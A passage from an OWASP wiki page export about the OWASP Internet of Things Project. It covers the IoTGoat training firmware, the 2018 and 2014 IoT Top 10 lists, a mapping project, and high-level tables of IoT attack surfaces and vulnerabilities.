*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]] <br />
<br />
To get more information on getting started visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=251798OWASP Internet of Things Project2019-05-22T16:33:19Z<p>Aaron.guzman: /* ICS/SCADA Project */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
